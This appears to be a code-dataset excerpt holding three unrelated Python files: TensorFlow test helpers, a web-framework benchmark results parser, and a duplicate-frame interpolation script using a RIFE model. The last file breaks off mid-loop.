If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal. %s" %
(device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
results.py
|
from toolset.utils.output_helper import log
import os
import subprocess
import uuid
import time
import json
import requests
import threading
import re
import math
import csv
import traceback
from datetime import datetime
# Cross-platform colored text
from colorama import Fore, Style
class Results:
def __init__(self, benchmarker):
'''
Constructor
'''
self.benchmarker = benchmarker
self.config = benchmarker.config
self.directory = os.path.join(self.config.results_root,
self.config.timestamp)
try:
os.makedirs(self.directory)
except OSError:
pass
self.file = os.path.join(self.directory, "results.json")
self.uuid = str(uuid.uuid4())
self.name = datetime.now().strftime(self.config.results_name)
self.environmentDescription = self.config.results_environment
try:
self.git = dict()
self.git['commitId'] = self.__get_git_commit_id()
self.git['repositoryUrl'] = self.__get_git_repository_url()
self.git['branchName'] = self.__get_git_branch_name()
except Exception:
#Could not read local git repository, which is fine.
self.git = None
self.startTime = int(round(time.time() * 1000))
self.completionTime = None
self.concurrencyLevels = self.config.concurrency_levels
self.pipelineConcurrencyLevels = self.config.pipeline_concurrency_levels
self.queryIntervals = self.config.query_levels
self.cachedQueryIntervals = self.config.cached_query_levels
self.frameworks = [t.name for t in benchmarker.tests]
self.duration = self.config.duration
self.rawData = dict()
self.rawData['json'] = dict()
self.rawData['db'] = dict()
self.rawData['query'] = dict()
self.rawData['fortune'] = dict()
self.rawData['update'] = dict()
self.rawData['plaintext'] = dict()
self.rawData['cached_query'] = dict()
self.completed = dict()
self.succeeded = dict()
self.succeeded['json'] = []
self.succeeded['db'] = []
self.succeeded['query'] = []
self.succeeded['fortune'] = []
self.succeeded['update'] = []
self.succeeded['plaintext'] = []
self.succeeded['cached_query'] = []
self.failed = dict()
self.failed['json'] = []
self.failed['db'] = []
self.failed['query'] = []
self.failed['fortune'] = []
self.failed['update'] = []
self.failed['plaintext'] = []
self.failed['cached_query'] = []
self.verify = dict()
#############################################################################
# PUBLIC FUNCTIONS
#############################################################################
def parse(self, tests):
'''
Ensures that the system has all necessary software to run
the tests. This does not include that software for the individual
test, but covers software such as curl and weighttp that
are needed.
'''
# Run the method to get the commmit count of each framework.
self.__count_commits()
# Call the method which counts the sloc for each framework
self.__count_sloc()
# Time to create parsed files
# Aggregate JSON file
with open(self.file, "w") as f:
f.write(json.dumps(self.__to_jsonable(), indent=2))
def parse_test(self, framework_test, test_type):
'''
Parses the given test and test_type from the raw_file.
'''
results = dict()
results['results'] = []
stats = []
if os.path.exists(self.get_raw_file(framework_test.name, test_type)):
with open(self.get_raw_file(framework_test.name,
test_type)) as raw_data:
is_warmup = True
rawData = None
for line in raw_data:
if "Queries:" in line or "Concurrency:" in line:
is_warmup = False
rawData = None
continue
if "Warmup" in line or "Primer" in line:
is_warmup = True
continue
if not is_warmup:
if rawData is None:
rawData = dict()
results['results'].append(rawData)
if "Latency" in line:
m = re.findall(r"([0-9]+\.*[0-9]*[us|ms|s|m|%]+)",
line)
if len(m) == 4:
rawData['latencyAvg'] = m[0]
rawData['latencyStdev'] = m[1]
rawData['latencyMax'] = m[2]
if "requests in" in line:
m = re.search("([0-9]+) requests in", line)
if m is not None:
rawData['totalRequests'] = int(m.group(1))
if "Socket errors" in line:
if "connect" in line:
m = re.search("connect ([0-9]+)", line)
rawData['connect'] = int(m.group(1))
if "read" in line:
m = re.search("read ([0-9]+)", line)
rawData['read'] = int(m.group(1))
if "write" in line:
m = re.search("write ([0-9]+)", line)
rawData['write'] = int(m.group(1))
if "timeout" in line:
m = re.search("timeout ([0-9]+)", line)
rawData['timeout'] = int(m.group(1))
if "Non-2xx" in line:
m = re.search("Non-2xx or 3xx responses: ([0-9]+)",
line)
if m != None:
rawData['5xx'] = int(m.group(1))
if "STARTTIME" in line:
m = re.search("[0-9]+", line)
rawData["startTime"] = int(m.group(0))
if "ENDTIME" in line:
m = re.search("[0-9]+", line)
rawData["endTime"] = int(m.group(0))
test_stats = self.__parse_stats(
framework_test, test_type,
rawData["startTime"], rawData["endTime"], 1)
stats.append(test_stats)
with open(
self.get_stats_file(framework_test.name, test_type) + ".json",
"w") as stats_file:
json.dump(stats, stats_file, indent=2)
return results
def parse_all(self, framework_test):
'''
Method meant to be run for a given timestamp
'''
for test_type in framework_test.runTests:
if os.path.exists(
self.get_raw_file(framework_test.name, test_type)):
results = self.parse_test(framework_test, test_type)
self.report_benchmark_results(framework_test, test_type,
results['results'])
def write_intermediate(self, test_name, status_message):
'''
Writes the intermediate results for the given test_name and status_message
'''
self.completed[test_name] = status_message
self.__write_results()
def set_completion_time(self):
'''
Sets the completionTime for these results and writes the results
'''
self.completionTime = int(round(time.time() * 1000))
self.__write_results()
def upload(self):
'''
Attempts to upload the results.json to the configured results_upload_uri
'''
if self.config.results_upload_uri is not None:
try:
requests.post(
self.config.results_upload_uri,
headers={'Content-Type': 'application/json'},
data=json.dumps(self.__to_jsonable(), indent=2),
timeout=300)
except Exception:
log("Error uploading results.json")
def load(self):
'''
Load the results.json file
'''
try:
with open(self.file) as f:
self.__dict__.update(json.load(f))
except (ValueError, IOError):
pass
def get_raw_file(self, test_name, test_type):
'''
Returns the output file for this test_name and test_type
Example: fw_root/results/timestamp/test_type/test_name/raw.txt
'''
path = os.path.join(self.directory, test_name, test_type, "raw.txt")
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
def get_stats_file(self, test_name, test_type):
'''
Returns the stats file name for this test_name and
Example: fw_root/results/timestamp/test_type/test_name/stats.txt
'''
path = os.path.join(self.directory, test_name, test_type, "stats.txt")
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
def report_verify_results(self, framework_test, test_type, result):
'''
Used by FrameworkTest to add verification details to our results
TODO: Technically this is an IPC violation - we are accessing
the parent process' memory from the child process
'''
if framework_test.name not in self.verify.keys():
self.verify[framework_test.name] = dict()
self.verify[framework_test.name][test_type] = result
def report_benchmark_results(self, framework_test, test_type, results):
'''
Used by FrameworkTest to add benchmark data to this
TODO: Technically this is an IPC violation - we are accessing
the parent process' memory from the child process
'''
if test_type not in self.rawData.keys():
self.rawData[test_type] = dict()
# If results has a size from the parse, then it succeeded.
if results:
self.rawData[test_type][framework_test.name] = results
# This may already be set for single-tests
if framework_test.name not in self.succeeded[test_type]:
self.succeeded[test_type].append(framework_test.name)
else:
# This may already be set for single-tests
if framework_test.name not in self.failed[test_type]:
self.failed[test_type].append(framework_test.name)
def finish(self):
'''
Finishes these results.
'''
if not self.config.parse:
# Normally you don't have to use Fore.BLUE before each line, but
# Travis-CI seems to reset color codes on newline (see travis-ci/travis-ci#2692)
# or stream flush, so we have to ensure that the color code is printed repeatedly
log("Verification Summary",
border='=',
border_bottom='-',
color=Fore.CYAN)
for test in self.benchmarker.tests:
log(Fore.CYAN + "| {!s}".format(test.name))
if test.name in self.verify.keys():
for test_type, result in self.verify[
test.name].iteritems():
if result.upper() == "PASS":
color = Fore.GREEN
elif result.upper() == "WARN":
color = Fore.YELLOW
else:
color = Fore.RED
log(Fore.CYAN + "| " + test_type.ljust(13) +
' : ' + color + result.upper())
else:
log(Fore.CYAN + "| " + Fore.RED +
"NO RESULTS (Did framework launch?)")
log('', border='=', border_bottom='', color=Fore.CYAN)
log("Results are saved in " + self.directory)
#############################################################################
# PRIVATE FUNCTIONS
#############################################################################
def __to_jsonable(self):
'''
Returns a dict suitable for jsonification
'''
toRet = dict()
toRet['uuid'] = self.uuid
toRet['name'] = self.name
toRet['environmentDescription'] = self.environmentDescription
toRet['git'] = self.git
toRet['startTime'] = self.startTime
toRet['completionTime'] = self.completionTime
toRet['concurrencyLevels'] = self.concurrencyLevels
toRet['pipelineConcurrencyLevels'] = self.pipelineConcurrencyLevels
toRet['queryIntervals'] = self.queryIntervals
toRet['cachedQueryIntervals'] = self.cachedQueryIntervals
toRet['frameworks'] = self.frameworks
toRet['duration'] = self.duration
toRet['rawData'] = self.rawData
toRet['completed'] = self.completed
toRet['succeeded'] = self.succeeded
toRet['failed'] = self.failed
toRet['verify'] = self.verify
toRet['testMetadata'] = self.benchmarker.metadata.to_jsonable()
return toRet
def __write_results(self):
try:
with open(self.file, 'w') as f:
f.write(json.dumps(self.__to_jsonable(), indent=2))
except IOError:
log("Error writing results.json")
def __count_sloc(self):
'''
Counts the significant lines of code for all tests and stores in results.
'''
frameworks = self.benchmarker.metadata.gather_frameworks(
self.config.test, self.config.exclude)
framework_to_count = {}
for framework, testlist in frameworks.items():
wd = testlist[0].directory
# Find the last instance of the word 'code' in the yaml output. This
# should be the line count for the sum of all listed files or just
# the line count for the last file in the case where there's only
# one file listed.
command = "cloc --yaml --follow-links . | grep code | tail -1 | cut -d: -f 2"
log("Running \"%s\" (cwd=%s)" % (command, wd))
try:
line_count = int(subprocess.check_output(command, cwd=wd, shell=True))
except (subprocess.CalledProcessError, ValueError) as e:
log("Unable to count lines of code for %s due to error '%s'" %
(framework, e))
continue
log("Counted %s lines of code" % line_count)
framework_to_count[framework] = line_count
self.rawData['slocCounts'] = framework_to_count
def __count_commits(self):
'''
Count the git commits for all the framework tests
'''
frameworks = self.benchmarker.metadata.gather_frameworks(
self.config.test, self.config.exclude)
def count_commit(directory, jsonResult):
command = "git rev-list HEAD -- " + directory + " | sort -u | wc -l"
try:
commitCount = subprocess.check_output(command, shell=True)
jsonResult[framework] = int(commitCount)
except subprocess.CalledProcessError:
pass
# Because git can be slow when run in large batches, this
# calls git up to 4 times in parallel. Normal improvement is ~3-4x
# in my trials, or ~100 seconds down to ~25
# This is safe to parallelize as long as each thread only
# accesses one key in the dictionary
threads = []
jsonResult = {}
# t1 = datetime.now()
for framework, testlist in frameworks.items():
directory = testlist[0].directory
t = threading.Thread(
target=count_commit, args=(directory, jsonResult))
t.start()
threads.append(t)
# Git has internal locks, full parallel will just cause contention
# and slowness, so we rate-limit a bit
if len(threads) >= 4:
threads[0].join()
threads.remove(threads[0])
# Wait for remaining threads
for t in threads:
t.join()
# t2 = datetime.now()
# print "Took %s seconds " % (t2 - t1).seconds
self.rawData['commitCounts'] = jsonResult
self.config.commits = jsonResult
def __get_git_commit_id(self):
'''
Get the git commit id for this benchmark
'''
return subprocess.check_output(
["git", "rev-parse", "HEAD"], cwd=self.config.fw_root).strip()
def __get_git_repository_url(self):
'''
Gets the git repository url for this benchmark
'''
return subprocess.check_output(
["git", "config", "--get", "remote.origin.url"],
cwd=self.config.fw_root).strip()
def __get_git_branch_name(self):
'''
Gets the git branch name for this benchmark
'''
return subprocess.check_output(
'git rev-parse --abbrev-ref HEAD',
shell=True,
cwd=self.config.fw_root).strip()
def __parse_stats(self, framework_test, test_type, start_time, end_time,
interval):
'''
For each test type, process all the statistics, and return a multi-layered
dictionary that has a structure as follows:
(timestamp)
| (main header) - group that the stat is in
| | (sub header) - title of the stat
| | | (stat) - the stat itself, usually a floating point number
'''
stats_dict = dict()
stats_file = self.get_stats_file(framework_test.name, test_type)
with open(stats_file) as stats:
# dstat doesn't output a completely compliant CSV file - we need to strip the header
for _ in range(4):
stats.next()
stats_reader = csv.reader(stats)
main_header = stats_reader.next()
sub_header = stats_reader.next()
time_row = sub_header.index("epoch")
int_counter = 0
for row in stats_reader:
time = float(row[time_row])
int_counter += 1
if time < start_time:
continue
elif time > end_time:
return stats_dict
if int_counter % interval != 0:
continue
row_dict = dict()
for nextheader in main_header:
if nextheader != "":
row_dict[nextheader] = dict()
header = ""
for item_num, column in enumerate(row):
if len(main_header[item_num]) != 0:
header = main_header[item_num]
# all the stats are numbers, so we want to make sure that they stay that way in json
row_dict[header][sub_header[item_num]] = float(column)
stats_dict[time] = row_dict
return stats_dict
def __calculate_average_stats(self, raw_stats):
'''
We have a large amount of raw data for the statistics that may be useful
for the stats nerds, but most people care about a couple of numbers. For
now, we're only going to supply:
* Average CPU
* Average Memory
* Total network use
* Total disk use
More may be added in the future. If they are, please update the above list.
Note: raw_stats is directly from the __parse_stats method.
Recall that this consists of a dictionary of timestamps, each of which
contain a dictionary of stat categories which contain a dictionary of stats
'''
raw_stat_collection = dict()
for time_dict in raw_stats.items()[1]:
for main_header, sub_headers in time_dict.items():
item_to_append = None
if 'cpu' in main_header:
# We want to take the idl stat and subtract it from 100
# to get the time that the CPU is NOT idle.
item_to_append = sub_headers['idl'] - 100.0
elif main_header == 'memory usage':
item_to_append = sub_headers['used']
elif 'net' in main_header:
# Network stats have two parts - recieve and send. We'll use a tuple of
# style (recieve, send)
item_to_append = (sub_headers['recv'], sub_headers['send'])
elif 'dsk' or 'io' in main_header:
# Similar for network, except our tuple looks like (read, write)
item_to_append = (sub_headers['read'], sub_headers['writ'])
if item_to_append is not None:
if main_header not in raw_stat_collection:
raw_stat_collection[main_header] = list()
raw_stat_collection[main_header].append(item_to_append)
# Simple function to determine human readable size
# http://stackoverflow.com/questions/1094841/reusable-library-to-get-human-readable-version-of-file-size
def sizeof_fmt(num):
# We'll assume that any number we get is convertable to a float, just in case
num = float(num)
for x in ['bytes', 'KB', 'MB', 'GB']:
if 1024.0 > num > -1024.0:
return "%3.1f%s" % (num, x)
num /= 1024.0
return "%3.1f%s" % (num, 'TB')
# Now we have our raw stats in a readable format - we need to format it for display
# We need a floating point sum, so the built in sum doesn't cut it
display_stat_collection = dict()
for header, values in raw_stat_collection.items():
display_stat = None
if 'cpu' in header:
display_stat = sizeof_fmt(math.fsum(values) / len(values))
elif main_header == 'memory usage':
display_stat = sizeof_fmt(math.fsum(values) / len(values))
elif 'net' in main_header:
receive, send = zip(*values) # unzip
display_stat = {
'receive': sizeof_fmt(math.fsum(receive)),
'send': sizeof_fmt(math.fsum(send))
}
else: # if 'dsk' or 'io' in header:
read, write = zip(*values) # unzip
display_stat = {
'read': sizeof_fmt(math.fsum(read)),
'write': sizeof_fmt(math.fsum(write))
}
display_stat_collection[header] = display_stat
return display_stat
|
inference_dpframes.py
|
import os
import sys
import cv2
import torch
import argparse
import numpy as np
from tqdm import tqdm
from torch.nn import functional as F
import warnings
import _thread
from queue import Queue, Empty
warnings.filterwarnings("ignore")
from pprint import pprint, pformat
import time
import psutil
import multiprocessing as mp
import inference_common
IOThreadsFlag = True
IOProcesses = []
cv2.setNumThreads(1)
# Exception handler
def exeption_handler(exctype, value, tb):
import traceback
locks = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'locks')
cmd = 'rm -f ' + locks + '/*'
os.system(cmd)
pprint ('%s in %s' % (value, exctype))
pprint(traceback.format_exception(exctype, value, tb))
sys.__excepthook__(exctype, value, tb)
input("Press Enter to continue...")
sys.excepthook = exeption_handler
# ctrl+c handler
import signal
def signal_handler(sig, frame):
global IOThreadsFlag
IOThreadsFlag = False
time.sleep(0.1)
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
def clear_write_buffer(args, write_buffer, input_duration, pbar=None):
global IOThreadsFlag
global IOProcesses
number_of_write_threads = 4
while IOThreadsFlag:
alive_processes = []
for process in IOProcesses:
if process.is_alive():
alive_processes.append(process)
else:
process.join(timeout=0)
IOProcesses = list(alive_processes)
item = write_buffer.get()
frame_number, image_data = item
if frame_number == -1:
IOThreadsFlag = False
break
path = os.path.join(os.path.abspath(args.output), '{:0>7d}.exr'.format(frame_number))
if len(IOProcesses) < number_of_write_threads:
try:
p = mp.Process(target=cv2.imwrite, args=(path, image_data[:, :, ::-1], [cv2.IMWRITE_EXR_TYPE, cv2.IMWRITE_EXR_TYPE_HALF], ))
p.start()
IOProcesses.append(p)
except:
try:
cv2.imwrite(path, image_data[:, :, ::-1], [cv2.IMWRITE_EXR_TYPE, cv2.IMWRITE_EXR_TYPE_HALF])
except Exception as e:
print ('Error wtiring %s: %s' % (path, e))
else:
try:
cv2.imwrite(path, image_data[:, :, ::-1], [cv2.IMWRITE_EXR_TYPE, cv2.IMWRITE_EXR_TYPE_HALF])
except Exception as e:
print ('Error wtiring %s: %s' % (path, e))
if pbar:
pbar.update(1)
def build_read_buffer(user_args, read_buffer, videogen):
global IOThreadsFlag
for frame in videogen:
frame_data = cv2.imread(os.path.join(user_args.input, frame), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
read_buffer.put(frame_data)
read_buffer.put(None)
def make_inference_rational(model, I0, I1, ratio, rthreshold=0.02, maxcycles = 8, UHD=False, always_interp=False):
I0_ratio = 0.0
I1_ratio = 1.0
rational_m = torch.mean(I0) * ratio + torch.mean(I1) * (1 - ratio)
if not always_interp:
if ratio <= I0_ratio + rthreshold / 2:
return I0
if ratio >= I1_ratio - rthreshold / 2:
return I1
for inference_cycle in range(0, maxcycles):
middle = model.inference(I0, I1, UHD)
middle_ratio = ( I0_ratio + I1_ratio ) / 2
if not always_interp:
if ratio - (rthreshold / 2) <= middle_ratio <= ratio + (rthreshold / 2):
return middle #+ (rational_m - torch.mean(middle)).expand_as(middle)
if ratio > middle_ratio:
I0 = middle
I0_ratio = middle_ratio
else:
I1 = middle
I1_ratio = middle_ratio
return middle #+ (rational_m - torch.mean(middle)).expand_as(middle)
def make_inference_rational_cpu(model, I0, I1, ratio, frame_num, w, h, write_buffer, rthreshold=0.02, maxcycles = 8, UHD=False, always_interp=False):
device = torch.device("cpu")
torch.set_grad_enabled(False)
I0_ratio = 0.0
I1_ratio = 1.0
# rational_m = torch.mean(I0) * ratio + torch.mean(I1) * (1 - ratio)
if not always_interp:
if ratio <= I0_ratio + rthreshold / 2:
I0 = (((I0[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, I0[:h, :w]))
return
if ratio >= I1_ratio - rthreshold / 2:
I1 = (((I1[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, I1[:h, :w]))
return
for inference_cycle in range(0, maxcycles):
middle = model.inference(I0, I1, UHD)
middle_ratio = ( I0_ratio + I1_ratio ) / 2
if not always_interp:
if ratio - (rthreshold / 2) <= middle_ratio <= ratio + (rthreshold / 2):
# middle = middle + (rational_m - torch.mean(middle)).expand_as(middle)
middle = (((middle[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, middle[:h, :w]))
return
if ratio > middle_ratio:
middle = middle.detach()
I0 = middle.to(device, non_blocking=True)
I0_ratio = middle_ratio
else:
middle = middle.detach()
I1 = middle.to(device, non_blocking=True)
I1_ratio = middle_ratio
# middle = middle + (rational_m - torch.mean(middle)).expand_as(middle)
middle = (((middle[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, middle[:h, :w]))
return
if __name__ == '__main__':
start = time.time()
msg = 'Fill / Remove duplicate frames\n'
msg += 'detect duplicate frames and fill it with interpolated frames instead\n'
msg += 'or just cut them out of resulting sequence'
parser = argparse.ArgumentParser(description=msg)
parser.add_argument('--input', dest='input', type=str, default=None, help='folder with input sequence')
parser.add_argument('--output', dest='output', type=str, default=None, help='folder to output sequence to')
parser.add_argument('--model', dest='model', type=str, default='./trained_models/default/v2.0.model')
parser.add_argument('--remove', dest='remove', action='store_true', help='remove duplicate frames')
parser.add_argument('--UHD', dest='UHD', action='store_true', help='flow size 1/4')
parser.add_argument('--cpu', dest='cpu', action='store_true', help='do not use GPU at all, process only on CPU')
args = parser.parse_args()
if (args.output is None or args.input is None):
parser.print_help()
sys.exit()
if args.remove:
print('Initializing duplicate frames removal...')
else:
print('Initializing duplicate frames interpolation...')
img_formats = ['.exr',]
files_list = []
for f in os.listdir(args.input):
name, ext = os.path.splitext(f)
if ext in img_formats:
files_list.append(f)
input_duration = len(files_list)
if input_duration < 3:
print('not enough input frames: %s given' % input_duration)
input("Press Enter to continue...")
sys.exit()
output_folder = os.path.abspath(args.output)
if not os.path.exists(output_folder):
os.makedirs(output_folder)
files_list.sort()
read_buffer = Queue(maxsize=444)
_thread.start_new_thread(build_read_buffer, (args, read_buffer, files_list))
if args.remove:
write_buffer = Queue(maxsize=mp.cpu_count() - 3)
_thread.start_new_thread(clear_write_buffer, (args, write_buffer, input_duration))
if torch.cuda.is_available() and not args.cpu:
device = torch.device("cuda")
torch.set_grad_enabled(False)
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
else:
device = torch.device("cpu")
torch.set_grad_enabled(False)
print('scanning for duplicate frames...')
pbar = tqdm(total=input_duration, desc='Total frames ', unit='frame')
pbar_dup = tqdm(total=input_duration, desc='Removed ', bar_format='{desc}: {n_fmt}/{total_fmt} |{bar}')
IPrevious = None
output_frame_num = 1
for file in files_list:
current_frame = read_buffer.get()
pbar.update(1) # type: ignore
ICurrent = torch.from_numpy(np.transpose(current_frame, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
if type(IPrevious) is not type(None):
diff = (F.interpolate(ICurrent,scale_factor=0.5, mode='bicubic', align_corners=False)
- F.interpolate(IPrevious, scale_factor=0.5, mode='bicubic', align_corners=False)).abs()
if diff.max() < 2e-3:
pbar_dup.update(1)
continue
write_buffer.put((output_frame_num, current_frame))
IPrevious = ICurrent
output_frame_num += 1
write_buffer.put((-1, -1))
while(IOThreadsFlag):
time.sleep(0.01)
pbar.close() # type: ignore
pbar_dup.close()
elif torch.cuda.is_available() and not args.cpu:
# Process on GPU
if 'v1.8.model' in args.model:
from model.RIFE_HD import Model # type: ignore
else:
from model.RIFE_HDv2 import Model # type: ignore
model = Model()
model.load_model(args.model, -1)
model.eval()
model.device()
print ('Trained model loaded: %s' % args.model)
first_image = cv2.imread(os.path.join(args.input, files_list[0]), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
h, w, _ = first_image.shape
ph = ((h - 1) // 64 + 1) * 64
pw = ((w - 1) // 64 + 1) * 64
padding = (0, pw - w, 0, ph - h)
device = torch.device("cuda")
torch.set_grad_enabled(False)
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
pbar = tqdm(total=input_duration, desc='Total frames', unit='frame')
pbar_dup = tqdm(total=input_duration, desc='Interpolating', bar_format='{desc}: {n_fmt}/{total_fmt} |{bar}')
write_buffer = Queue(maxsize=mp.cpu_count() - 3)
_thread.start_new_thread(clear_write_buffer, (args, write_buffer, input_duration, pbar))
IPrevious = None
dframes = 0
output_frame_num = 1
for file in files_list:
current_frame = read_buffer.get()
ICurrent = torch.from_numpy(np.transpose(current_frame, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
if not args.remove:
ICurrent = F.pad(ICurrent, padding)
if type(IPrevious) is not type(None):
diff = (F.interpolate(ICurrent,scale_factor=0.5, mode='bicubic', align_corners=False)
- F.interpolate(IPrevious, scale_factor=0.5, mode='bicubic', align_corners=False)).abs()
if diff.max() < 2e-3:
dframes += 1
continue
if dframes and not args.remove:
rstep = 1 / ( dframes + 1 )
ratio = rstep
for dframe in range(0, dframes):
mid = make_inference_rational(model, IPrevious, ICurrent, ratio, UHD = args.UHD)
mid = (((mid[0]).cpu().numpy().transpose(1, 2, 0)))
write_buffer.put((output_frame_num, mid[:h, :w]))
# pbar.update(1) # type: ignore
pbar_dup.update(1)
output_frame_num += 1
ratio += rstep
write_buffer.put((output_frame_num, current_frame))
# pbar.update(1) # type: ignore
IPrevious = ICurrent
output_frame_num += 1
dframes = 0
# send write loop exit code
write_buffer.put((-1, -1))
# it should put IOThreadsFlag to False it return
while(IOThreadsFlag):
time.sleep(0.01)
# pbar.update(1)
pbar.close() # type: ignore
pbar_dup.close()
else:
# process on CPU
if 'v1.8.model' in args.model:
from model_cpu.RIFE_HD import Model # type: ignore
else:
from model_cpu.RIFE_HDv2 import Model # type: ignore
model = Model()
model.load_model(args.model, -1)
model.eval()
model.device()
print ('Trained model loaded: %s' % args.model)
first_image = cv2.imread(os.path.join(args.input, files_list[0]), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
h, w, _ = first_image.shape
ph = ((h - 1) // 64 + 1) * 64
pw = ((w - 1) // 64 + 1) * 64
padding = (0, pw - w, 0, ph - h)
device = torch.device("cpu")
torch.set_grad_enabled(False)
sim_workers, thread_ram = inference_common.safe_threads_number(h, w)
pbar = tqdm(total=input_duration, desc='Total frames', unit='frame')
pbar_dup = tqdm(total=input_duration, desc='Interpolating', bar_format='{desc}: {n_fmt}/{total_fmt} |{bar}')
write_buffer = mp.Queue(maxsize=mp.cpu_count() - 3)
_thread.start_new_thread(clear_write_buffer, (args, write_buffer, input_duration, pbar))
IPrevious = None
dframes = 0
output_frame_num = 1
active_workers = []
for file in files_list:
current_frame = read_buffer.get()
# pbar.update(1) # type: ignore
ICurrent = torch.from_numpy(np.transpose(current_frame, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
ICurrent = F.pad(ICurrent, padding)
if type(IPrevious) is not type(None):
diff = (F.interpolate(ICurrent,scale_factor=0.5, mode='bicubic', align_corners=False)
- F.interpolate(IPrevious, scale_factor=0.5, mode='bicubic', align_corners=False)).abs()
if diff.max() < 2e-3:
dframes += 1
continue
if dframes:
rstep = 1 / ( dframes + 1 )
ratio = rstep
last_thread_time = time.time()
for dframe in range(dframes):
p = mp.Process(target=make_inference_rational_cpu, args=(model, IPrevious, ICurrent, ratio, output_frame_num, w, h, write_buffer), kwargs = {'UHD': args.UHD})
p.start()
active_workers.append(p)
if (time.time() - last_thread_time) < (thread_ram / 8):
